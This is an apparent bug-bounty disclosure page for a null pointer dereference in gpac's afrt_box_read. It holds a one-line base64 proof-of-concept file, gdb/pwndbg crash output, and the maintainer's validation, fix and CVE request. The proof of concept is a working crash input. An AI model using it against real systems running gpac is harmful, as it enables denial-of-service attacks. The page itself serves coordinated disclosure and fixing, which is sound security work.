NULL Pointer Dereference in gpac/gpac

Valid

Reported on

Feb 1st 2022


Description

Null Pointer Dereference in afrt_box_read

Proof of Concept

echo AAAAEW1ldGFzXSAAAABkaXIAAAAAYWZydHRzdnB5dG/oAwBtAGwAAm0= | base64 -d > poc

gdb output

pwndbg> r -bt poc
Starting program: /run/shm/gpac/bin/gcc/MP4Box -bt poc
ERROR: Could not find ELF base!
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
[iso file] Box "meta" (start 0) has 5 extra bytes

Program received signal SIGSEGV, Segmentation fault.
0x00007ffff79aedfe in afrt_box_read () from /run/shm/gpac/bin/gcc/libgpac.so.10
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
───────────────────────────────────────────────────────────────────────────────[ REGISTERS ]────────────────────────────────────────────────────────────────────────────────
 RAX  0xffffffff
 RBX  0x5555555ca500 —▸ 0x5555555c92e0 ◂— 0xfbad2498
 RCX  0x5555555ca8b0 ◂— 0x0
 RDX  0x491
 RDI  0x0
 RSI  0x5555555ca890 ◂— 0x0
 R8   0x5555555ca8a0 —▸ 0x7ffff770bbe0 (main_arena+96) —▸ 0x5555555d2910 ◂— 0x33 /* '3' */
 R9   0x5555555cad40 ◂— 0x490
 R10  0x5555555c9010 ◂— 0x3000200050000
 R11  0x7ffff770bbe0 (main_arena+96) —▸ 0x5555555d2910 ◂— 0x33 /* '3' */
 R12  0x7
 R13  0xffffffff
 R14  0x5555555caf60 ◂— 0x61667274 /* 'trfa' */
 R15  0x8
 RBP  0x5555555ca8a0 —▸ 0x7ffff770bbe0 (main_arena+96) —▸ 0x5555555d2910 ◂— 0x33 /* '3' */
 RSP  0x7fffffff7dd0 ◂— 0x5
 RIP  0x7ffff79aedfe (afrt_box_read+142) ◂— mov    byte ptr [rbp + rax], 0
─────────────────────────────────────────────────────────────────────────────────[ DISASM ]─────────────────────────────────────────────────────────────────────────────────
 ► 0x7ffff79aedfe <afrt_box_read+142>    mov    byte ptr [rbp + rax], 0
   0x7ffff79aee03 <afrt_box_read+147>    test   r13d, r13d
   0x7ffff79aee06 <afrt_box_read+150>    je     afrt_box_read+343 <afrt_box_read+343>
    ↓
   0x7ffff79aeec7 <afrt_box_read+343>    mov    rax, qword ptr [r14 + 8]
   0x7ffff79aeecb <afrt_box_read+347>    jmp    afrt_box_read+224 <afrt_box_read+224>
    ↓
   0x7ffff79aee50 <afrt_box_read+224>    mov    r15d, dword ptr [rsp + 0xc]
   0x7ffff79aee55 <afrt_box_read+229>    mov    rdi, qword ptr [r14 + 0x30]
   0x7ffff79aee59 <afrt_box_read+233>    mov    qword ptr [r14 + 8], rax
   0x7ffff79aee5d <afrt_box_read+237>    mov    rsi, rbp
   0x7ffff79aee60 <afrt_box_read+240>    mov    edx, r15d
   0x7ffff79aee63 <afrt_box_read+243>    call   gf_list_insert@plt <gf_list_insert@plt>
─────────────────────────────────────────────────────────────────────────────────[ STACK ]──────────────────────────────────────────────────────────────────────────────────
00:0000│ rsp 0x7fffffff7dd0 ◂— 0x5
01:0008│     0x7fffffff7dd8 ◂— 0x555ca7d0
02:0010│     0x7fffffff7de0 ◂— 0x8
03:0018│     0x7fffffff7de8 —▸ 0x7fffffff7f60 ◂— 0x0
04:0020│     0x7fffffff7df0 —▸ 0x5555555ca500 —▸ 0x5555555c92e0 ◂— 0xfbad2498
05:0028│     0x7fffffff7df8 ◂— 0x18
06:0030│     0x7fffffff7e00 ◂— 0x61667274 /* 'trfa' */
07:0038│     0x7fffffff7e08 —▸ 0x5555555caf60 ◂— 0x61667274 /* 'trfa' */
───────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]────────────────────────────────────────────────────────────────────────────────
 ► f 0   0x7ffff79aedfe afrt_box_read+142
   f 1   0x7ffff79562a9 gf_isom_box_parse_ex+1145
   f 2   0x7ffff7956a50 gf_isom_parse_root_box+64
   f 3   0x7ffff795f16c gf_isom_parse_movie_boxes_internal+236
   f 4   0x7ffff79608f7 gf_isom_open_file+311
   f 5   0x55555557f614 mp4boxMain+19444
   f 6   0x7ffff75470b3 __libc_start_main+243
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> bt
#0  0x00007ffff79aedfe in afrt_box_read () from /run/shm/gpac/bin/gcc/libgpac.so.10
#1  0x00007ffff79562a9 in gf_isom_box_parse_ex () from /run/shm/gpac/bin/gcc/libgpac.so.10
#2  0x00007ffff7956a50 in gf_isom_parse_root_box () from /run/shm/gpac/bin/gcc/libgpac.so.10
#3  0x00007ffff795f16c in gf_isom_parse_movie_boxes_internal () from /run/shm/gpac/bin/gcc/libgpac.so.10
#4  0x00007ffff79608f7 in gf_isom_open_file () from /run/shm/gpac/bin/gcc/libgpac.so.10
#5  0x000055555557f614 in mp4boxMain ()
#6  0x00007ffff75470b3 in __libc_start_main (main=0x55555556d500 <main>, argc=3, argv=0x7fffffffdda8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>,
 stack_end=0x7fffffffdd98) at ../csu/libc-start.c:308
#7  0x000055555556d53e in _start ()

Impact

This vulnerability is capable of crashing software, so I think this can be described as DoS.

References

We are processing your report and will contact the gpac team within 24 hours. 4 months ago
We have contacted a member of the gpac team and are waiting to hear back 4 months ago
gpac/gpac maintainer
4 months ago

Maintainer


https://github.com/gpac/gpac/issues/2093

gpac/gpac maintainer validated this vulnerability 4 months ago
pres1er has been awarded the disclosure bounty
The fix bounty is now up for grabs
gpac/gpac maintainer confirmed that a fix has been merged on 34a23c 4 months ago
The fix bounty has been dropped
Jamie Slome
4 months ago

Admin


@mantainer - the researcher has requested a CVE for this report. Are you happy for us to go ahead and assign a CVE to this report?

to join this conversation